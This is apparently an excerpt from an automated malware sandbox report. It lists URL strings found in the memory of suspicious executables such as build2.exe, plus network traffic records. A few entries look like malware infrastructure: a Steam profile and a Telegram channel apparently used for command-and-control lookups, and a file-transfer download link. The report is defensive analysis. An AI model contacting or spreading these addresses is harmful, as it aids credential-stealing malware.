            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: build2.exe, 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000939000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715$d6
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/badges
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/inventory/
            Source: build2.exe, 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okRed
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
            Source: build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: A0B.exe, 00000017.00000003.3036752678.0000000003BBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
            Source: build2.exe, 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/sa9ok
            Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
            Source: DB15.exe, 00000011.00000002.4519701063.0000000000641000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000002.00000000.2110427730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
            Source: explorer.exe, 00000022.00000003.3237926713.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3199766395.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193350386.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3204949143.000000000950D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: explorer.exe, 00000002.00000000.2112529074.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
            Source: build2.exe, 00000029.00000003.3356770274.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: A0B.exe, 00000017.00000003.3037411971.0000000003AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
            Source: A0B.exe, 00000017.00000003.3037411971.0000000003AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/P.exe
            Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
            Source: build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000600000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000600000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/HIDHIDAEHC
            Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
            Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
            Source: explorer.exe, 00000022.00000002.4531306676.0000000007BCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/20-gop-senators-led-by-rick-scott-vow-to-block-bills-not-rel
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49711 version: TLS 1.2
